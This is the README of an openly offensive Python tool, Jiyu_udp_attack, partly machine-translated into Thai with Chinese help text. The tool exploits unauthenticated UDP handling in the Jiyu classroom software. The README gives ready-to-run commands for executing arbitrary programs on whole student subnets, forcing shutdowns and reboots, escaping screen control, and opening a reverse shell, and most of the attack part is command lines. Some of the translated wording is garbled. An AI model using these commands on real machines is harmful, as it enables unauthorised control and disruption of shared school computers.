Jiyu_udp_attack

• เนื่องจากเครื่องเทอร์มินัลนักเรียนของ Jiyu ไม่ดำเนินการตรวจสอบสิทธิ์ (=・ω・=) บนแพ็กเก็ต UDP ที่ได้รับ เราจึงสามารถสร้างแพ็กเก็ตข้อมูลเฉพาะสำหรับเครื่องเทอร์มินัลนักเรียนเพื่อดำเนินการ ดังนั้นจึงบรรลุการดำเนินการตามคำสั่งและโจมตีนักเรียนที่ออนไลน์ในห้องคอมพิวเตอร์ เครื่องจักร.

• หลาม3

เวอร์ชัน 1.5

• แก้ไขข้อบกพร่องในการดำเนินการคำสั่ง

เวอร์ชัน 1.4

• การสร้างโค้ดใหม่ การเพิ่มประสิทธิภาพตรรกะการเลือกพารามิเตอร์
• ฟังก์ชั่น Rebound Shell เพิ่มพอร์ตสุ่ม
• อัปเดตเอกสาร

เวอร์ชัน 1.3

• ปลด/เรียกคืนการควบคุมหน้าจอ
• รองรับเชลล์เด้งกลับ

เวอร์ชัน 1.2

• แก้ไขข้อผิดพลาด

เวอร์ชัน 1.1

• ตัวเลือก -g รองรับการรับพอร์ตที่นักเรียนกำลังฟังอยู่

เวอร์ชัน 1.0

• ส่งครั้งแรก

 usage:

    ------------------- Github Repositories -------------------
            https://github.com/ht0Ruial/Jiyu_udp_attack

       [-h] -ip IP [-p P] [-msg MSG] [-c C] [-l L] [-t T]
       [-e {r,s,g,nc,break,continue}]
       {r,s,g,nc,break,continue} ...

positional arguments:
  {r,s,g,nc,break,continue}
                        -e 参数的详细说明
    r                   reboot 重启
    s                   shutdown 关机
    g                   独立选项，获取当前的ip地址以及学生端监听的端口
    nc                  独立选项，反弹shell的机器需出网，退出可使用命令exit
    break               独立选项，脱离屏幕控制，需要管理员权限
    continue            独立选项，恢复屏幕控制

optional arguments:
  -h, --help            show this help message and exit
  -ip IP                ip 指定目标IP地址
  -p P                  port 指定监听端口，默认端口为4705
  -msg MSG              send_message发送消息 eg: -msg "HelloWord!"
  -c C                  command命令 eg: -c "cmd.exe /c ipconfig"
  -l L                  循环次数，默认为1
  -t T                  循环时间间隔，默认是22秒
  -e {r,s,g,nc,break,continue}
                        Extra Options加载额外的选项 eg：-e r
          

เมื่อใช้พารามิเตอร์ -ip เพื่อระบุ IP เป้าหมาย คุณสามารถระบุได้ด้วยวิธีต่อไปนี้:

• ระบุ IP เดียว เช่น 192.168.80.12
• ระบุช่วง IP เช่น 192.168.80.10-56
• ระบุเซ็กเมนต์ C ที่มี IP อยู่ เช่น 192.168.80.1/24

หากพอร์ตการฟังฝั่งนักเรียนไม่ใช่ค่าเริ่มต้น 4705 คุณต้องใช้พารามิเตอร์ -p เพื่อระบุพอร์ตระหว่างการดำเนินการในภายหลัง

 python Jiyu_udp_attack.py -e g

สิทธิ์ที่กำลังทำงานอยู่ในปัจจุบันจะต้องเป็นสิทธิ์ของผู้ดูแลระบบ ซึ่งส่วนใหญ่จะใช้เพื่อเริ่มบริการ MpsSvc

 python Jiyu_udp_attack.py -e break

 python Jiyu_udp_attack.py -e continue

หากพอร์ตการฟังฝั่งนักเรียนคือ 4705 ให้ส่งข้อความที่มีเนื้อหา "hello, baby!" ไปยังเครื่องด้วยที่อยู่ IP 192.168.80.12

 python Jiyu_udp_attack.py -ip 192.168.80.12 -msg "hello,baby!"

หากพอร์ตการฟังฝั่งนักเรียนคือ 4605 คุณต้องใช้พารามิเตอร์ -p เพื่อระบุพอร์ตและส่งข้อความที่มีเนื้อหา "hello, baby!" ไปยังเครื่องด้วยที่อยู่ IP 192.168.80.12

 python Jiyu_udp_attack.py -ip 192.168.80.12 -p 4605 -msg "hello,baby!"

เล่นเครื่องคิดเลขตั้งแต่ 192.168.80.12 ถึง 192.168.80.137

 python Jiyu_udp_attack.py -ip 192.168.80.12-137 -c calc.exe

เมื่อทำการดีดกลับเชลล์ IP จะเป็นได้เฉพาะ IP ของเครื่องบางเครื่องเท่านั้น และไม่สามารถดีดกลับเป็นชุดได้ ยิ่งกว่านั้น เครื่องจำเป็นต้องออกจากเครือข่ายเนื่องจากมีการนำการดำเนินการแบบแบตช์ของคำสั่งที่กำหนดเองมาใช้ โดยพิจารณาว่าการดีดกลับแบบแบตช์นั้นไม่มีความหมาย มันไม่ได้ถูกเพิ่ม

 python Jiyu_udp_attack.py -ip 192.168.80.12 -e nc

ปิดเครื่อง

 python Jiyu_udp_attack.py -ip 192.168.80.12 -e s

รีสตาร์ท

 python Jiyu_udp_attack.py -ip 192.168.80.12 -e r

ส่งข้อความอย่างต่อเนื่องโดยใช้การวนซ้ำ
เครื่อง 1-254 จะได้รับข้อความ "hello, baby!" และจะดำเนินการต่อไปหลังจากผ่านไป 50 วินาที รวมเป็น 3 ครั้ง

    python Jiyu_udp_attack.py -ip 192.168.80.23/24 -msg "hello,baby!" -l 3 -t 50